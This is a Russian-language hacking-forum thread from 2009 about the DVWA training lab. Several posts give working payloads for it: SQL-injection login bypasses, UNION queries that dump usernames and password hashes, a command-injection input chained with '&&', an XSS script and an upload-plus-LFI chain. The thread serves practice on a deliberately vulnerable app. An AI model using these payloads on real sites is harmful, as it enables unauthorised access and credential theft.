Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Damn Vulnerable Web App. Тренировочная площадка. |

16.07.2009, 15:38
|
|
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме: 1698585
Репутация:
818
|
|
Damn Vulnerable Web App. Тренировочная площадка.
Это веб-приложение - тренировочная площадка для испытания и совершенствования своих навыков в поиске и использовании веб-уязвимостей.
Имеет три уровня безопасности(сложности).
Поддерживает следующие виды атак:
*SQL Injection
*XSS (Cross Site Scripting)
*LFI (Local File Inclusion)
*RFI (Remote File Inclusion)
*Command Execution
*Upload Script
*Login Brute Force
*и многие другие..
Для использования необходим вебсервер + база данных MySQL
Видео с наиподробнейшим описанием и инструкцией можно посмотреть здесь: http://www.youtube.com/watch?v=GzIj07jt8rM
Подробности на оф.сайте: http://www.ethicalhack3r.co.uk/
Скачать dvwa v1.0.4: dvwa v1.0.4: http://sourceforge.net/projects/dvwa
|
|
|

06.08.2009, 18:07
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме: 556476
Репутация:
66
|
|
|
|
|

06.08.2009, 19:38
|
|
Познающий
Регистрация: 07.05.2009
Сообщений: 54
Провел на форуме: 487201
Репутация:
80
|
|
ТС, ты бы еще сюда ссылки на игровые образы CTF выложил  пусть народ потренируется
|
|
|

06.12.2009, 12:39
|
|
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
Провел на форуме: 217423
Репутация:
32
|
|
для тех кто пытался проходить...
1) уровень "Low"->Brute force
Код:
$user=$_GET['username'];
$pass=$_GET['password'];
$pass = md5($pass);
$qry="SELECT * FROM `users` WHERE user='$user' AND password='$pass';";
$result=mysql_query($qry) or die('<pre>' . mysql_error() . '</pre>' );
Обошел так:
логин: admin'#
пароль: можно оставить пустым, так как уязвим только логин.
Вопрос: почему не сработало admin'--+ (в качестве тренировочной площадки - денвер)
уровень "Medium"->Brute force
Код:
$user = $_GET['username'];
$user = mysql_real_escape_string($user);
$pass=$_GET['password'];
$pass = mysql_real_escape_string($pass);
$pass = md5($pass);
$qry="SELECT * FROM `users` WHERE user='$user' AND password='$pass';";
$result=mysql_query($qry) or die('<pre>' . mysql_error() . '</pre>' );
Опять же уязвимость в поле логин.
Вопрос: реально ли обойти mysql_real_escape_string()? или здесь токо брутфорс поможет?
|
|
|

06.12.2009, 16:49
|
|
Познающий
Регистрация: 19.06.2009
Сообщений: 34
Провел на форуме: 88269
Репутация:
10
|
|
It's easy
В SQL-Inj на medium:
Код:
-1 UNION SELECT 1,2 /*
1 и 2 подставляем как хотим, а вместо строк узаем HEX
|
|
|

06.12.2009, 20:45
|
|
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
Провел на форуме: 810079
Репутация:
90
|
|
Сообщение от mr.celt
уровень "Medium"->Brute force
Код:
$user = $_GET['username'];
$user = mysql_real_escape_string($user);
$pass=$_GET['password'];
$pass = mysql_real_escape_string($pass);
$pass = md5($pass);
$qry="SELECT * FROM `users` WHERE user='$user' AND password='$pass';";
$result=mysql_query($qry) or die('<pre>' . mysql_error() . '</pre>' );
Опять же уязвимость в поле логин.
Вопрос: реально ли обойти mysql_real_escape_string()? или здесь токо брутфорс поможет?
Функция mysql_real_escape_string() экранирует кавычки, поэтому выполнить обход авторизации нельзя.
|
|
|

06.12.2009, 22:43
|
|
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
Провел на форуме: 217423
Репутация:
32
|
|
Сообщение от Nik(rus)
It's easy
В SQL-Inj на medium:
Код:
-1 UNION SELECT 1,2 /*
1 и 2 подставляем как хотим, а вместо строк узаем HEX
Че-то не понял тебя, ты этим хочешь обойти авторизацию? В post-инъекции?
|
|
|

06.12.2009, 23:28
|
|
Новичок
Регистрация: 25.03.2009
Сообщений: 8
Провел на форуме: 28989
Репутация:
-1
|
|
кому интересно - существует ещё Damn Vulnerable Linux 
damnvulnerablelinux.org
|
|
|

08.12.2009, 07:37
|
|
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме: 1698585
Репутация:
818
|
|
Сообщение от mr.celt
Че-то не понял тебя, ты этим хочешь обойти авторизацию? В post-инъекции?
Он просто не совсем полностью выложил скуль:
-1 UNION SELECT password,2 FROM USERS--
И получаем всех юзверов.
В Command Execution на Лов лвл, можно юзать дополнительно команды, разделяя их как в Линуксе так и в Винде амперсандами, пример:
На выходе получаем пинг, переход в диск Ц, и список файлов и папок. Ну а дальше от фантазии зависит.
ЗЫ Доступна версия 1.0.6, давайте не спим делимся опытом, кто что нашел интересного, я только начал.
|
|
|

08.12.2009, 19:31
|
|
Познающий
Регистрация: 19.06.2009
Сообщений: 34
Провел на форуме: 88269
Репутация:
10
|
|
Вот как я ломал
1.Low SQL-Inj
Код:
-1' UNION SELECT concat_ws(0x3A,user(),version(),database()),'ololo sql :D'/*
Узнаем инфу, дальше:
Код:
-1' UNION SELECT table_name,'table' FROM information_schema.tables WHERE table_schema='dvwa'/*
Тут узнали таблицы, дальше:
Код:
-1' UNION SELECT column_name,'column' FROM information_schema.columns WHERE table_schema='dvwa'/*
Так узнаем колонки, и наконец:
Код:
-1' UNION SELECT concat_ws(0x3A,user_id,first_name,last_name,user,password,avatar),concat('info about ',first_name,' aka ',user) FROM users/*
Юзверята 
2. Low Brute
Тут 2 пути:
1) Через скулю (это вооонтам наверху) достаем хэши, брутим на hashcracking,gdataonline, md5.rednoise etc, благо пароли слабые
2)
Код:
Логин: admin' /*
Пасс: ололо админ школота
Ну и угадайте что происходит 
3. Low Command Execution
Код:
127.0.0.1 && dir C:\
Наблюдаем пинг 127.0.0.1 и листинг диска C:\
4. Low Upload
Код:
No comments aka тупо льем
5. Low File Inclusion
Код:
http://site/fi_content.php
=> инклудит файлы из корня
Тут видно, что есть связка - LFI и Upload Vuln, берем сканер по хеадерам и сканим известные диры aka up, upload, uploads и находим uploads с прямым листингом 
6. XSS
Код:
</pre><script>alert('xss :D')</script><pre>some HaCkEr
Видим тупую XSS
7. BONUS:
в медиум SQL-Inj:
Код:
-1 UNION SELECT concat_ws(0x3A,user(),version(),database()),2/*
Вот такие пироги
С последующими уровнями становится больше и больше фильтров, но как говорится на каждый замок - своя отмычка
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|